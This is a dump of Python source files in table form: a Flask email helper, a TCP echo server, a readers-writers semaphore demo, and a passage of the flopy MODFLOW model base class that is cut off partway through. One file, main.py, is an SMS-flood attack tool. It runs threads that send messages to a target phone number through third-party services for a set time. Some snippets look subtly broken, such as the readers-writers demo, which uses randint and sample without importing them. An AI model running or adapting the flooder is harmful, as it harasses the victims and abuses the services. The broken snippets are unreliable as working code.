source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
email.py | #!/usr/bin/env python
# coding=utf-8
from threading import Thread
from flask import current_app, render_template, copy_current_request_context
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
    """Thread worker: send *msg* via Flask-Mail inside *app*'s application context.

    A real application object (not the ``current_app`` proxy) must be passed,
    because this runs outside the request thread and must build its own context.
    """
    with app.app_context():
        mail.send(msg)
def send_email(to, subject, template, **kwargs):
    """Render ``template`` (.txt and .html variants) and mail it to *to*.

    The message is sent on a background thread so the request is not blocked;
    the started Thread is returned so callers may ``join()`` it if needed.
    """
    app = current_app._get_current_object()
    subject_line = app.config['FLASK_MAIL_SUBJECT_PREFIX'] + subject
    msg = Message(subject_line,
                  sender=app.config['FLASK_MAIL_SENDER'],
                  recipients=[to])
    msg.body = render_template(template + '.txt', **kwargs)
    msg.html = render_template(template + '.html', **kwargs)
    worker = Thread(target=send_async_email, args=(app, msg))
    worker.start()
    return worker
|
main.py | import time
from threading import Thread
# Import modules for SMS & CALL flood
import tools.SMS.sendRequest as request
import tools.SMS.numberTools as number
import tools.SMS.randomData as randomData
def SMS_ATTACK(threads, attack_time, phone):
# Finish
global FINISH
FINISH = False
threads_list = []
# Get services list
services = request.getServices()
# Make for Russian numbers
phone = number.normalize(phone)
# Get country name by phone
country = number.getCountry(phone)
print("[#] Starting SMS flood to number: " + phone + ", country: " + country + ", time: " + str(attack_time) + " secounds..")
# Send SMS
def sms_flood():
while not FINISH:
service = randomData.random_service(services)
service = request.Service(service)
service.sendMessage(phone)
# Start threads
for thread in range(threads):
print("[#] Staring thread " + str(thread))
t = Thread(target = sms_flood)
t.start()
threads_list.append(t)
# Sleep selected secounds
try:
time.sleep(attack_time)
except KeyboardInterrupt:
FINISH = True
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("[!] Attack stopped!") |
python3-60.py | #Example app - TCP Echo Server
#Make a TCP server in a process that handles multiple clients
#Echos back the data the client sent
#Imports
import logging
import multiprocessing
import socket
import select
logging.basicConfig(format='%(levelname)s - %(asctime)s: %(message)s',datefmt='%H:%M:%S', level=logging.DEBUG)
#Server
def chatserver(ip, port):
    """Run a non-blocking TCP echo server on (ip, port) until the process dies.

    Multiplexes the listening socket and all connected clients with
    select() (0.5 s timeout) and echoes every received payload back to
    its sender. An empty recv() means the peer closed; the socket is
    then closed and dropped from the reader set.
    """
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Allow quick restarts without 'address already in use' errors.
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    logging.info(f'Binding to {ip}:{port}')
    server.bind((ip, port))
    server.setblocking(False)
    server.listen(100)
    logging.info(f'Listening on {ip}:{port}')
    readers = [server]
    while True:
        readable, _, _ = select.select(readers, [], [], 0.5)
        for s in readable:
            try:
                if s is server:
                    client, address = s.accept()
                    client.setblocking(False)
                    readers.append(client)
                    logging.info(f'Connection: {address}')
                else:
                    data = s.recv(1024)
                    if data:
                        logging.info(f'Echo: {data}')
                        # BUG FIX: send() may write only part of the
                        # payload; sendall() retries until all is echoed.
                        s.sendall(data)
                    else:
                        logging.info(f'Remove: {s}')
                        s.close()
                        readers.remove(s)
            except Exception as ex:
                # keep the server alive on per-socket errors
                logging.warning(ex.args)
#Main
def main():
    """Interactive driver: 'start' launches the echo-server process, 'stop' ends it."""
    svr = multiprocessing.Process(target=chatserver,
                                  args=['localhost', 2067],
                                  daemon=True, name='Server')
    started = False
    while True:
        command = input('Enter a command (start, stop)')
        if command == 'start':
            if started:
                # BUG FIX: a multiprocessing.Process can only be started
                # once; a second 'start' used to raise.
                logging.info('Server already running')
            else:
                logging.info('Starting the server')
                svr.start()
                started = True
        if command == 'stop':
            logging.info('Stopping the server')
            # BUG FIX: terminate()/join()/close() on a never-started
            # process raises; only tear down if it was started.
            if started:
                svr.terminate()
                svr.join()
                svr.close()
            logging.info('Server stopped')
            break
    logging.info('Application finished')


if __name__ == "__main__":
    main()
readers_writers.py | from threading import Semaphore, Thread
from concurrency.synchronization import LightSwitch
def write(array, no_writers, no_readers, write_switch):
    """Writer: bar readers via the lightswitch, then mutate slot 3 exclusively."""
    write_switch.lock(no_readers)
    # Semaphore supports the context-manager protocol: acquire/release.
    with no_writers:
        array[3] = randint(0, 30)
    write_switch.unlock(no_readers)
def read(array, no_writers, no_readers, read_switch):
    """Reader: register with the lightswitch (first reader blocks writers), then read."""
    # Hold no_readers only while flipping the switch, exactly as before.
    with no_readers:
        read_switch.lock(no_writers)
    print(array[3])
    read_switch.unlock(no_writers)
if __name__ == '__main__':
    num_readers = num_writers = 30
    read_switch = LightSwitch()
    write_switch = LightSwitch()
    no_readers = Semaphore(1)
    no_writers = Semaphore(1)
    # BUG FIX: range() objects do not support item assignment in Python 3,
    # so every writer thread crashed with TypeError; use a mutable list.
    array = list(range(10))
    writers = [Thread(target=write, args=(array, no_writers, no_readers, write_switch))
               for _ in range(num_writers)]
    readers = [Thread(target=read, args=(array, no_writers, no_readers, read_switch))
               for _ in range(num_readers)]
    all_threads = writers + readers
    # sample(xs, len(xs)) is a shuffled copy: start in random order.
    for t in sample(all_threads, len(all_threads)):
        t.start()
    # join order does not matter; iterate the plain list.
    for t in all_threads:
        t.join()
|
mbase.py | """
mbase module
This module contains the base model class from which
all of the other models inherit.
"""
from __future__ import print_function
import sys
import os
import subprocess as sp
import shutil
import threading
if sys.version_info > (3, 0):
import queue as Queue
else:
import Queue
from datetime import datetime
import copy
import numpy as np
from flopy import utils
from .version import __version__
if sys.version_info >= (3, 3):
from shutil import which
else:
from distutils.spawn import find_executable as which
# Global variables
iconst = 1 # Multiplier for individual array elements in integer and real arrays read by MODFLOW's U2DREL, U1DREL and U2DINT.
iprn = -1 # Printout flag. If >= 0 then array values read are printed in listing file.
class FileDataEntry(object):
    """Plain record describing one model file: name, unit number and flags.

    Parameters
    ----------
    fname : str
        file name
    unit : int
        file unit number
    binflag : bool
        True for a binary file (default False)
    output : bool
        True when the file is model output (default False)
    package : str or None
        name of the package the file belongs to (default None)
    """

    def __init__(self, fname, unit, binflag=False, output=False, package=None):
        # store descriptors verbatim; this is a pure value object
        self.unit = unit
        self.fname = fname
        self.package = package
        self.output = output
        self.binflag = binflag
class FileData(object):
    """Ordered collection of FileDataEntry records, unique by fname and unit."""

    def __init__(self):
        self.file_data = []
        return

    def add_file(self, fname, unit, binflag=False, output=False, package=None):
        """Add a file entry, replacing any entry with the same name or unit."""
        ipop = []
        for idx, file_data in enumerate(self.file_data):
            if file_data.fname == fname or file_data.unit == unit:
                ipop.append(idx)
        # BUG FIX: the collected duplicate indices were never removed,
        # leaving stale entries with the same name or unit in the list.
        for idx in reversed(ipop):
            self.file_data.pop(idx)
        self.file_data.append(FileDataEntry(fname, unit, binflag=binflag,
                                            output=output, package=package))
        return
class BaseModel(object):
"""
MODFLOW based models base class
Parameters
----------
modelname : string
Name of the model. Model files will be given this name. (default is
'modflowtest')
namefile_ext : string
name file extension (default is 'nam')
exe_name : string
name of the modflow executable
model_ws : string
Path to the model workspace. Model files will be created in this
directory. Default is None, in which case model_ws is assigned
to the current working directory.
"""
def __init__(self, modelname='modflowtest', namefile_ext='nam',
exe_name='mf2k.exe', model_ws=None,
structured=True, **kwargs):
"""
BaseModel init
"""
self.__name = modelname
self.namefile_ext = namefile_ext
self.namefile = self.__name + '.' + self.namefile_ext
self.packagelist = []
self.heading = ''
self.exe_name = exe_name
self.external_extension = 'ref'
if model_ws is None: model_ws = os.getcwd()
if not os.path.exists(model_ws):
try:
os.makedirs(model_ws)
except:
print(
'\n{0:s} not valid, workspace-folder was changed to {1:s}\n'.format(
model_ws, os.getcwd()))
model_ws = os.getcwd()
self._model_ws = model_ws
self.structured = structured
self.pop_key_list = []
self.cl_params = ''
# check for reference info in kwargs
# we are just carrying these until a dis package is added
self._xul = kwargs.pop("xul", None)
self._yul = kwargs.pop("yul", None)
self._rotation = kwargs.pop("rotation", 0.0)
self._proj4_str = kwargs.pop("proj4_str", "EPSG:4326")
self._start_datetime = kwargs.pop("start_datetime", "1-1-1970")
# Model file information
self.__onunit__ = 10
# external option stuff
self.array_free_format = True
self.free_format_input = True
self.parameter_load = False
self.array_format = None
self.external_fnames = []
self.external_units = []
self.external_binflag = []
self.external_output = []
self.package_units = []
self._next_ext_unit = None
# output files
self.output_fnames = []
self.output_units = []
self.output_binflag = []
self.output_packages = []
return
def next_unit(self, i=None):
if i is not None:
self.__onunit__ = i - 1
else:
self.__onunit__ += 1
return self.__onunit__
def next_ext_unit(self):
"""
Function to encapsulate next_ext_unit attribute
"""
next_unit = self._next_ext_unit + 1
self._next_ext_unit += 1
return next_unit
def export(self, f, **kwargs):
    """Export the model to *f* via flopy's export helpers."""
    from .export import utils as export_utils
    return export_utils.model_helper(f, self, **kwargs)
def add_package(self, p):
"""
Add a package.
Parameters
----------
p : Package object
"""
for idx, u in enumerate(p.unit_number):
if u != 0:
if u in self.package_units or u in self.external_units:
try:
pn = p.name[idx]
except:
pn = p.name
msg = "WARNING: unit {} ".format(u) + \
"of package {} already in use".format(pn)
print(msg)
self.package_units.append(u)
for i, pp in enumerate(self.packagelist):
if pp.allowDuplicates:
continue
elif isinstance(p, type(pp)):
print('****Warning -- two packages of the same type: ',
type(p), type(pp))
print('replacing existing Package...')
self.packagelist[i] = p
return
if self.verbose:
print('adding Package: ', p.name[0])
self.packagelist.append(p)
def remove_package(self, pname):
"""
Remove a package from this model
Parameters
----------
pname : string
Name of the package, such as 'RIV', 'BAS6', etc.
"""
for i, pp in enumerate(self.packagelist):
if pname.upper() in pp.name:
if self.verbose:
print('removing Package: ', pp.name)
# Remove the package object from the model's packagelist
p = self.packagelist.pop(i)
# Remove the package unit number from the list of package
# units stored with the model
for iu in p.unit_number:
if iu in self.package_units:
self.package_units.remove(iu)
return
raise StopIteration(
'Package name ' + pname + ' not found in Package list')
def __getattr__(self, item):
    """
    __getattr__ - syntactic sugar

    Parameters
    ----------
    item : str
        3 character package name (case insensitive) or "sr" to access
        the SpatialReference instance of the ModflowDis object

    Returns
    -------
    sr : SpatialReference instance
    pp : Package object
        Package object of type :class:`flopy.pakbase.Package`

    Note
    ----
    if self.dis is not None, then the spatial reference instance is updated
    using self.dis.delr, self.dis.delc, and self.dis.lenuni before being
    returned
    """
    # NOTE(review): 'self.dis' itself resolves through this __getattr__
    # (falling through to get_package('DIS')), so the special names
    # below return None instead of raising when no DIS package exists.
    if item == 'sr':
        if self.dis is not None:
            return self.dis.sr
        else:
            return None
    if item == 'tr':
        if self.dis is not None:
            return self.dis.tr
        else:
            return None
    if item == "start_datetime":
        if self.dis is not None:
            return self.dis.tr.start_datetime
        else:
            return None
    # any other attribute is treated as a package-name lookup; returns
    # None (not AttributeError) when no such package is loaded
    return self.get_package(item)
def get_ext_dict_attr(self, ext_unit_dict=None, unit=None, filetype=None,
pop_key=True):
iu = None
fname = None
if ext_unit_dict is not None:
for key, value in ext_unit_dict.items():
if key == unit:
iu = key
fname = os.path.basename(value.filename)
break
elif value.filetype == filetype:
iu = key
fname = os.path.basename(value.filename)
if pop_key:
self.add_pop_key_list(iu)
break
return iu, fname
def _output_msg(self, i, add=True):
if add:
txt1 = 'Adding'
txt2 = 'to'
else:
txt1 = 'Removing'
txt2 = 'from'
msg = '{} {} '.format(txt1, self.output_fnames[i]) + \
'(unit={}) '.format(self.output_units[i]) + \
'{} the output list.'.format(txt2)
print(msg)
def add_output_file(self, unit, fname=None, extension='cbc',
                    binflag=True, package=None):
    """
    Add an ascii or binary output file for a package

    Parameters
    ----------
    unit : int
        unit number of external array
    fname : str
        filename of external array. (default is None)
    extension : str
        extension to use for the cell-by-cell file. Only used if fname
        is None. (default is cbc)
    binflag : bool
        boolean flag indicating if the output file is a binary file.
        Default is True
    package : str
        string that defines the package the output file is attached to.
        Default is None
    """
    # only positive unit numbers create a new entry by default; a
    # negative unit only updates an existing entry
    add_cbc = False
    if unit > 0:
        add_cbc = True
    # if the unit was registered as an external file, carry its name and
    # binary flag over before re-registering it as output
    if abs(unit) in self.external_units:
        idx = self.external_units.index(abs(unit))
        if fname is None:
            fname = os.path.basename(self.external_fnames[idx])
        binflag = self.external_binflag[idx]
        self.remove_external(unit=abs(unit))
    # if the unit is already an output file, either re-add it (when the
    # binary flag changed) or just attach the package name to the entry
    if abs(unit) in self.output_units:
        add_cbc = False
        idx = self.output_units.index(abs(unit))
        # determine if binflag has changed
        if binflag is not self.output_binflag[idx]:
            add_cbc = True
        if add_cbc:
            self.remove_output(unit=abs(unit))
        else:
            if package is not None:
                self.output_packages[idx].append(package)
    if add_cbc:
        if fname is None:
            fname = self.name + '.' + extension
        # check if this file name exists for a different unit number
        if fname in self.output_fnames:
            idx = self.output_fnames.index(fname)
            iut = self.output_units[idx]
            if iut != unit:
                # include unit number in fname if package has
                # not been passed
                if package is None:
                    fname = self.name + '.{}.'.format(unit) \
                            + extension
                # include package name in fname
                else:
                    fname = self.name + '.{}.'.format(package) \
                            + extension
        else:
            fname = os.path.basename(fname)
        self.add_output(fname, unit, binflag=binflag, package=package)
    return
def add_output(self, fname, unit, binflag=False, package=None):
"""
Assign an external array so that it will be listed as a DATA or
DATA(BINARY) entry in the name file. This will allow an outside
file package to refer to it.
Parameters
----------
fname : str
filename of external array
unit : int
unit number of external array
binflag : boolean
binary or not. (default is False)
"""
if fname in self.output_fnames:
print("BaseModel.add_output() warning: " +
"replacing existing filename {0}".format(fname))
idx = self.output_fnames.index(fname)
if self.verbose:
self._output_msg(idx, add=False)
self.output_fnames.pop(idx)
self.output_units.pop(idx)
self.output_binflag.pop(idx)
self.output_packages.pop(idx)
self.output_fnames.append(fname)
self.output_units.append(unit)
self.output_binflag.append(binflag)
if package is not None:
self.output_packages.append([package])
else:
self.output_packages.append([])
if self.verbose:
self._output_msg(-1, add=True)
return
def remove_output(self, fname=None, unit=None):
"""
Remove an output file from the model by specifying either the
file name or the unit number.
Parameters
----------
fname : str
filename of output array
unit : int
unit number of output array
"""
if fname is not None:
for i, e in enumerate(self.output_fnames):
if fname in e:
if self.verbose:
self._output_msg(i, add=False)
self.output_fnames.pop(i)
self.output_units.pop(i)
self.output_binflag.pop(i)
self.output_packages.pop(i)
elif unit is not None:
for i, u in enumerate(self.output_units):
if u == unit:
if self.verbose:
self._output_msg(i, add=False)
self.output_fnames.pop(i)
self.output_units.pop(i)
self.output_binflag.pop(i)
self.output_packages.pop(i)
else:
raise Exception(
' either fname or unit must be passed to remove_output()')
return
def get_output(self, fname=None, unit=None):
"""
Get an output file from the model by specifying either the
file name or the unit number.
Parameters
----------
fname : str
filename of output array
unit : int
unit number of output array
"""
if fname is not None:
for i, e in enumerate(self.output_fnames):
if fname in e:
return self.output_units[i]
return None
elif unit is not None:
for i, u in enumerate(self.output_units):
if u == unit:
return self.output_fnames[i]
return None
else:
raise Exception(
' either fname or unit must be passed to get_output()')
return
def set_output_attribute(self, fname=None, unit=None, attr=None):
"""
Set a variable in an output file from the model by specifying either
the file name or the unit number and a dictionary with attributes
to change.
Parameters
----------
fname : str
filename of output array
unit : int
unit number of output array
"""
idx = None
if fname is not None:
for i, e in enumerate(self.output_fnames):
if fname in e:
idx = i
break
return None
elif unit is not None:
for i, u in enumerate(self.output_units):
if u == unit:
idx = i
break
else:
raise Exception(
' either fname or unit must be passed ' +
' to set_output_attribute()')
if attr is not None:
if idx is not None:
for key, value in attr.items:
if key == 'binflag':
self.output_binflag[idx] = value
elif key == 'fname':
self.output_fnames[idx] = value
elif key == 'unit':
self.output_units[idx] = value
return
def get_output_attribute(self, fname=None, unit=None, attr=None):
"""
Get a attribute for an output file from the model by specifying either
the file name or the unit number.
Parameters
----------
fname : str
filename of output array
unit : int
unit number of output array
"""
idx = None
if fname is not None:
for i, e in enumerate(self.output_fnames):
if fname in e:
idx = i
break
return None
elif unit is not None:
for i, u in enumerate(self.output_units):
if u == unit:
idx = i
break
else:
raise Exception(
' either fname or unit must be passed ' +
' to set_output_attribute()')
v = None
if attr is not None:
if idx is not None:
if attr == 'binflag':
v = self.output_binflag[idx]
elif attr == 'fname':
v = self.output_fnames[idx]
elif attr == 'unit':
v = self.output_units[idx]
return v
def add_external(self, fname, unit, binflag=False, output=False):
"""
Assign an external array so that it will be listed as a DATA or
DATA(BINARY) entry in the name file. This will allow an outside
file package to refer to it.
Parameters
----------
fname : str
filename of external array
unit : int
unit number of external array
binflag : boolean
binary or not. (default is False)
"""
if fname in self.external_fnames:
print("BaseModel.add_external() warning: " +
"replacing existing filename {}".format(fname))
idx = self.external_fnames.index(fname)
self.external_fnames.pop(idx)
self.external_units.pop(idx)
self.external_binflag.pop(idx)
self.external_output.pop(idx)
if unit in self.external_units:
print("BaseModel.add_external() warning: " +
"replacing existing unit {}".format(unit))
idx = self.external_units.index(unit)
self.external_fnames.pop(idx)
self.external_units.pop(idx)
self.external_binflag.pop(idx)
self.external_output.pop(idx)
self.external_fnames.append(fname)
self.external_units.append(unit)
self.external_binflag.append(binflag)
self.external_output.append(output)
return
def remove_external(self, fname=None, unit=None):
"""
Remove an external file from the model by specifying either the
file name or the unit number.
Parameters
----------
fname : str
filename of external array
unit : int
unit number of external array
"""
plist = []
if fname is not None:
for i, e in enumerate(self.external_fnames):
if fname in e:
plist.append(i)
elif unit is not None:
for i, u in enumerate(self.external_units):
if u == unit:
plist.append(i)
else:
raise Exception(
' either fname or unit must be passed to remove_external()')
# remove external file
j = 0
for i in plist:
ipos = i - j
self.external_fnames.pop(ipos)
self.external_units.pop(ipos)
self.external_binflag.pop(ipos)
self.external_output.pop(ipos)
j += 1
return
def add_existing_package(self, filename, ptype=None,
                         copy_to_model_ws=True):
    """
    Add an existing package to a model instance.

    Parameters
    ----------
    filename : str
        the name of the file to add as a package
    ptype : optional
        the model package type (e.g. "lpf", "wel", etc). If None,
        then the file extension of the filename arg is used
    copy_to_model_ws : bool
        flag to copy the package file into the model_ws directory.

    Returns
    -------
    None
    """
    if ptype is None:
        ptype = filename.split('.')[-1]
    ptype = str(ptype).upper()

    # build a minimal stand-in object satisfying the Package interface
    # used by add_package()/write_input(); write_file is a no-op because
    # the package file already exists on disk
    class Obj(object):
        pass

    fake_package = Obj()
    fake_package.write_file = lambda: None
    fake_package.extra = ['']
    fake_package.name = [ptype]
    fake_package.extension = [filename.split('.')[-1]]
    fake_package.unit_number = [self.next_ext_unit()]
    if copy_to_model_ws:
        base_filename = os.path.split(filename)[-1]
        fake_package.file_name = [base_filename]
        shutil.copy2(filename, os.path.join(self.model_ws, base_filename))
    else:
        fake_package.file_name = [filename]
    # allow several existing packages of the same type side by side
    fake_package.allowDuplicates = True
    self.add_package(fake_package)
def get_name_file_entries(self):
"""
Get a string representation of the name file.
Parameters
----------
"""
s = ''
for p in self.packagelist:
for i in range(len(p.name)):
if p.unit_number[i] == 0:
continue
s += '{:14s} {:5d} '.format(p.name[i], p.unit_number[i]) + \
'{:s} {:s}\n'.format(p.file_name[i], p.extra[i])
return s
def has_package(self, name):
"""
Check if package name is in package list.
Parameters
----------
name : str
Name of the package, 'DIS', 'BAS6', etc. (case-insensitive).
Returns
-------
bool
True if package name exists, otherwise False if not found.
"""
if not name:
raise ValueError('invalid package name')
name = name.upper()
for p in self.packagelist:
for pn in p.name:
if pn.upper() == name:
return True
return False
def get_package(self, name):
"""
Get a package.
Parameters
----------
name : str
Name of the package, 'RIV', 'LPF', etc. (case-insensitive).
Returns
-------
pp : Package object
Package object of type :class:`flopy.pakbase.Package`
"""
if not name:
raise ValueError('invalid package name')
name = name.upper()
for pp in (self.packagelist):
if pp.name[0].upper() == name:
return pp
return None
def get_package_list(self):
"""
Get a list of all the package names.
Parameters
----------
Returns
-------
val : list of strings
Can be used to see what packages are in the model, and can then
be used with get_package to pull out individual packages.
"""
val = []
for pp in (self.packagelist):
val.append(pp.name[0].upper())
return val
def set_version(self, version):
    """Set the model version, validate it against version_types, and
    refresh the name-file heading and every package heading."""
    self.version = version.lower()
    # check that this is a valid model version
    if self.version not in self.version_types:
        err = 'Error: Unsupported model version ({}).'.format(
            self.version) + ' Valid model versions are:'
        for v in self.version_types:
            err += ' {}'.format(v)
        raise Exception(err)
    # set namefile heading
    self.heading = ('# Name file for ' +
                    '{}, '.format(self.version_types[self.version]) +
                    'generated by Flopy version {}.'.format(__version__))
    # set heading for each package
    for pname in self.get_package_list():
        pak = self.get_package(pname)
        pak.heading = ('# {} package for '.format(pak.name[0]) +
                       '{}, '.format(self.version_types[self.version]) +
                       'generated by Flopy version {}.'.format(__version__))
    return None
def change_model_ws(self, new_pth=None, reset_external=False):
    """
    Change the model work space.

    Parameters
    ----------
    new_pth : str
        Location of new model workspace. If this path does not exist,
        it will be created. (default is None, which will be assigned to
        the present working directory).
    reset_external : bool
        if True, rewrite stored external-file paths relative to the new
        workspace (default is False)

    Returns
    -------
    None
    """
    if new_pth is None:
        new_pth = os.getcwd()
    if not os.path.exists(new_pth):
        try:
            sys.stdout.write(
                '\ncreating model workspace...\n {}\n'.format(new_pth))
            os.makedirs(new_pth)
        except:
            # NOTE(review): bare except keeps any failure non-fatal by
            # falling back to the current working directory
            line = '\n{} not valid, workspace-folder '.format(new_pth) + \
                   'was changed to {}\n'.format(os.getcwd())
            print(line)
            new_pth = os.getcwd()
    # --reset the model workspace
    old_pth = self._model_ws
    self._model_ws = new_pth
    line = '\nchanging model workspace...\n {}\n'.format(new_pth)
    sys.stdout.write(line)
    # reset the paths for each package
    for pp in (self.packagelist):
        pp.fn_path = os.path.join(self.model_ws, pp.file_name[0])
    # create the external path (if needed)
    if hasattr(self, "external_path") and self.external_path is not None \
            and not os.path.exists(os.path.join(self._model_ws,
                                                self.external_path)):
        pth = os.path.join(self._model_ws, self.external_path)
        os.makedirs(pth)
        if reset_external:
            self._reset_external(pth, old_pth)
    elif reset_external:
        self._reset_external(self._model_ws, old_pth)
    return None
def _reset_external(self, pth, old_pth):
    """Rewrite self.external_fnames so non-output entries stay reachable
    relative to the new external path *pth*."""
    new_ext_fnames = []
    for ext_file, output in zip(self.external_fnames,
                                self.external_output):
        if output:
            # output files are written fresh; keep the stored name as-is
            new_ext_file = ext_file
        else:
            # input files must remain readable from the new workspace:
            # resolve bare names against the old workspace, then express
            # the containing directory relative to the new external path
            fdir = os.path.dirname(ext_file)
            if fdir == '':
                fpth = os.path.abspath(os.path.join(old_pth, ext_file))
            else:
                fpth = ext_file
            ao = os.path.abspath(os.path.dirname(fpth))
            ep = os.path.abspath(pth)
            relp = os.path.relpath(ao, ep)
            new_ext_file = os.path.join(relp, os.path.basename(ext_file))
        new_ext_fnames.append(new_ext_file)
    self.external_fnames = new_ext_fnames
@property
def model_ws(self):
    """Model workspace directory (returned as a copy so callers cannot
    rebind internal state; use change_model_ws() to modify it)."""
    return copy.deepcopy(self._model_ws)
def _set_name(self, value):
"""
Set model name
Parameters
----------
value : str
Name to assign to model.
"""
self.__name = str(value)
self.namefile = self.__name + '.' + self.namefile_ext
for p in self.packagelist:
for i in range(len(p.extension)):
p.file_name[i] = self.__name + '.' + p.extension[i]
p.fn_path = os.path.join(self.model_ws, p.file_name[0])
def __setattr__(self, key, value):
    """Intercept assignments to keep derived state in sync.

    'name' and 'model_ws' are routed through their setters; 'sr', 'tr'
    and 'start_datetime' are forwarded to the DIS package (raising when
    no ModflowDis is attached); everything else is stored normally.
    """
    if key == "free_format_input":
        # stored normally; listed separately as a hook point for BAS6
        super(BaseModel, self).__setattr__(key, value)
    elif key == "name":
        self._set_name(value)
    elif key == "model_ws":
        self.change_model_ws(value)
    elif key == "sr":
        assert isinstance(value, utils.SpatialReference)
        if self.dis is not None:
            self.dis.sr = value
        else:
            raise Exception("cannot set SpatialReference -"
                            "ModflowDis not found")
    elif key == "tr":
        assert isinstance(value, utils.TemporalReference)
        if self.dis is not None:
            self.dis.tr = value
        else:
            raise Exception("cannot set TemporalReference -"
                            "ModflowDis not found")
    elif key == "start_datetime":
        if self.dis is not None:
            self.dis.start_datetime = value
            self.tr.start_datetime = value
        else:
            raise Exception("cannot set start_datetime -"
                            "ModflowDis not found")
    else:
        super(BaseModel, self).__setattr__(key, value)
def run_model(self, silent=False, pause=False, report=False,
              normal_msg='normal termination'):
    """
    This method will run the model using subprocess.Popen.

    Parameters
    ----------
    silent : boolean
        Suppress echo of run information to the screen (default is
        False).
    pause : boolean, optional
        Pause upon completion (default is False).
    report : boolean, optional
        Save stdout lines to a list (buff) which is returned
        by the method . (default is False).
    normal_msg : str
        Normal termination message used to determine if the
        run terminated normally. (default is 'normal termination')

    Returns
    -------
    (success, buff)
    success : boolean
    buff : list of lines of stdout
    """
    # delegate to the module-level run_model() helper (defined elsewhere
    # in this module), pointed at this model's exe, name file and ws
    return run_model(self.exe_name, self.namefile, model_ws=self.model_ws,
                     silent=silent, pause=pause, report=report,
                     normal_msg=normal_msg)
def load_results(self):
    """Placeholder: subclasses override this to load simulation results."""
    print('load_results not implemented')
    return None
def write_input(self, SelPackList=False, check=False):
    """
    Write the input.

    Parameters
    ----------
    SelPackList : False or list of packages
        if False, write every package; otherwise only the packages
        whose names appear in this list
    check : bool
        if True, run the model-level check before writing (default
        is False)
    """
    if check:
        # run check prior to writing input
        self.check(f='{}.chk'.format(self.name), verbose=self.verbose,
                   level=1)
    # reset the model to free_format if parameter substitution was
    # performed on a model load
    if self.parameter_load and not self.free_format_input:
        if self.verbose:
            print('\nResetting free_format_input to True to ' +
                  'preserve the precision of the parameter data.')
        self.free_format_input = True
    if self.verbose:
        print('\nWriting packages:')
    if SelPackList == False:
        for p in self.packagelist:
            if self.verbose:
                print(' Package: ', p.name[0])
            # prevent individual package checks from running after
            # model-level package check above
            # otherwise checks are run twice
            # or the model level check procedure would have to be split up
            # or each package would need a check argument,
            # or default for package level check would have to be False
            try:
                p.write_file(check=False)
            except TypeError:
                # older packages take no 'check' argument
                p.write_file()
    else:
        for pon in SelPackList:
            for i, p in enumerate(self.packagelist):
                if pon in p.name:
                    if self.verbose:
                        print(' Package: ', p.name[0])
                    try:
                        p.write_file(check=False)
                    except TypeError:
                        p.write_file()
                    break
    if self.verbose:
        print(' ')
    # write name file
    self.write_name_file()
    return
def write_name_file(self):
    """
    Every Package needs its own writenamefile function
    """
    # abstract-method stand-in: concrete model classes must override
    raise Exception(
        'IMPLEMENTATION ERROR: writenamefile must be overloaded')
def set_model_units(self):
    """
    Every model needs its own set_model_units method
    """
    # abstract-method stand-in: concrete model classes must override
    raise Exception(
        'IMPLEMENTATION ERROR: set_model_units must be overloaded')
@property
def name(self):
    """
    Get model name

    Returns
    -------
    name : str
        name of model (a copy; assign to ``self.name`` to rename)
    """
    return copy.deepcopy(self.__name)
def add_pop_key_list(self, key):
"""
Add a external file unit number to a list that will be used to remove
model output (typically binary) files from ext_unit_dict.
Parameters
----------
key : int
file unit number
Returns
-------
Examples
--------
"""
if key not in self.pop_key_list:
self.pop_key_list.append(key)
def check(self, f=None, verbose=True, level=1):
    """
    Check model data for common errors.

    Parameters
    ----------
    f : str or file handle
        String defining file name or file handle for summary file
        of check method output. If a string is passed a file handle
        is created. If f is None, check method does not write
        results to a summary file. (default is None)
    verbose : bool
        Boolean flag used to determine if check method results are
        written to the screen
    level : int
        Check method analysis level. If level=0, summary checks are
        performed. If level=1, full checks are performed.

    Returns
    -------
    None

    Examples
    --------
    >>> import flopy
    >>> m = flopy.modflow.Modflow.load('model.nam')
    >>> m.check()
    """
    # check instance for model-level check
    chk = utils.check(self, f=f, verbose=verbose, level=level)
    results = {}
    # run each package's own check one level shallower than the model's
    for p in self.packagelist:
        if chk.package_check_levels.get(p.name[0].lower(), 0) <= level:
            results[p.name[0]] = p.check(f=None, verbose=False,
                                         level=level - 1)
    # model level checks
    # solver check: exactly one compatible solver package must be loaded
    if self.version in chk.solver_packages.keys():
        solvers = set(chk.solver_packages[self.version]).intersection(
            set(self.get_package_list()))
        if not solvers:
            chk._add_to_summary('Error', desc='\r No solver package',
                                package='model')
        elif len(list(solvers)) > 1:
            for s in solvers:
                chk._add_to_summary('Error',
                                    desc='\r Multiple solver packages',
                                    package=s)
        else:
            chk.passed.append('Compatible solver package')
    # check for unit number conflicts
    package_units = {}
    duplicate_units = {}
    for p in self.packagelist:
        for i in range(len(p.name)):
            if p.unit_number[i] != 0:
                if p.unit_number[i] in package_units.values():
                    duplicate_units[p.name[i]] = p.unit_number[i]
                    otherpackage = [k for k, v in package_units.items()
                                    if v == p.unit_number[i]][0]
                    duplicate_units[otherpackage] = p.unit_number[i]
                # BUG FIX: the seen-units dict was never populated, so
                # no conflict could ever be detected.
                package_units[p.name[i]] = p.unit_number[i]
    if len(duplicate_units) > 0:
        for k, v in duplicate_units.items():
            chk._add_to_summary('Error', package=k, value=v,
                                desc='unit number conflict')
    else:
        chk.passed.append('Unit number conflicts')
    # add package check results to model level check summary
    for k, r in results.items():
        if r is not None and r.summary_array is not None:  # currently SFR doesn't have one
            chk.summary_array = np.append(chk.summary_array,
                                          r.summary_array).view(
                np.recarray)
            chk.passed += ['{} package: {}'.format(r.package.name[0], psd)
                           for psd in r.passed]
    chk.summarize()
    return chk
def plot(self, SelPackList=None, **kwargs):
    """
    Plot 2-D, 3-D, transient 2-D, and stress period list (MfList)
    model input data.

    Parameters
    ----------
    SelPackList : None or list of str
        List of packages to plot (e.g. ['DIS', 'LPF']). If
        SelPackList=None all packages are plotted. (default is None)
    **kwargs : dict
        filename_base : str
            Base file name that will be used to automatically generate file
            names for output image files. Plots will be exported as image
            files if file_name_base is not None. (default is None)
        file_extension : str
            Valid matplotlib.pyplot file extension for savefig(). Only used
            if filename_base is not None. (default is 'png')
        mflay : int
            MODFLOW zero-based layer number to return. If None, then all
            layers will be included. (default is None)
        kper : int
